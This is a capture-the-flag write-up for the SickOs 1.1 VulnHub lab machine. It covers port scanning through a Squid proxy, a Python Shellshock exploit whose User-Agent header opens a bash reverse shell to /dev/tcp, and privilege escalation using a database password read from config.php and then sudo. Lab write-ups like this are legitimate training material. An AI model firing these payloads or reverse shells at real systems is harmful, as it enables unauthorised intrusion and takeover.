NOTES ABOUT SickOs 1.1

[ 2016-01-24 ] [ VulnHub / SickOs 1.1 ]

Status: Rooted
Skills: Port Scanning, Proxy Scanning, ShellShock, Reverse Shell, Sudo
Tools: nmap, squidscan, linuxprivchecker.py

PORT SCANNING

root@kali:~# nmap -v -sS -A -p- 10.17.0.103

Starting Nmap 7.00 ( https://nmap.org ) at 2016-01-24 01:57 ART

[...]

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

[...]

PORT SCANNING THROUGHT PROXY

SCRIPT:

#!/usr/bin/python
import requests
proxy = { "http": "http://10.17.0.103:3128" }
f = open("puertos", 'r')
for n in f:
	try: 
		r = requests.get("http://127.0.0.1:" + n.strip(), proxies=proxy, timeout=0.1)
		if r.status_code == 200:
			print "Puerto " + n.strip() + " abierto."
	except requests.exceptions.Timeout:
		pass

RESULT:

root@kali:~/CTF/sickos# python squidscan
Puerto 22 abierto.
Puerto 80 abierto.
Puerto 3306 abierto.

root@kali:~# nikto --host http://127.0.0.1 -useproxy http://10.17.0.103:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          127.0.0.1
+ Target Hostname:    127.0.0.1
+ Target Port:        80
+ Proxy:              10.17.0.103:3128
+ Start Time:         2016-01-24 02:37:04 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21

[...]

+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).

[...]

+ End Time:           2016-01-24 02:37:34 (GMT-3) (30 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

GETTING IN

SCRIPT: SHELLSHOCK EXPLOIT THROUGHT PROXY REVERSE SHELL

#!/usr/bin/python
import requests
target = "http://127.0.0.1/cgi-bin/status"
proxy = { "http": "http://10.17.0.103:3128" }
payload = { "user-agent" : "() { :; };/bin/bash -i >& /dev/tcp/10.17.0.30/1234 0>&1" }
requests.get(target,headers=payload,proxies=proxy)

root@kali:~# nc -lvp 1234

root@kali:~# python shellshock.py

ELEVATING PRIVILEGES

SCRIPT: linuxprivchecker.py - Security Sift

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

[+] Hostname
    SickOs

[+] Operating System
    Ubuntu 12.04.4 LTS \n \l

[*] GETTING NETWORKING INFO...
[*] GETTING FILESYSTEM INFO...
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[...]
[+] All users
    [...]
    sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
    [...]
	
[+] Current User
    www-data

[+] Current User ID
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...

[+] World Writeable Directories for User/Group 'Root'
    [...]
    drwxrwxrwx 7 root root 4096 Dec  5 06:25 /var/www/wolfcms/wolf
    [...]

[+] World Writable Files
    [...]
    -rwxrwxrwx 1 root root 6815 Dec  5 06:32 /var/www/wolfcms/index.php
    -rwxrwxrwx 1 root root 3058 Dec  5 07:26 /var/www/wolfcms/config.php
    -rwxrwxrwx 1 root root 894 Dec  5 06:15 /var/www/wolfcms/favicon.ico
    -rwxrwxrwx 1 root root 4084 Dec  5 06:15 /var/www/wolfcms/CONTRIBUTING.md
    [...]

[*] ENUMERATING PROCESSES AND APPLICATIONS...
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...

Finished
=================================================================================================

www-data@SickOs:/var/www/wolfcms$ cat config.php
<?php 

[...]

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

[...]

?>

www-data@SickOs:/$ su sickos
Password: john@123

sickos@SickOs:/$ 

sickos@SickOs:~$ cat .bash_history
sudo su
exit

FLAG:

root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

--- Loaded 946 times ---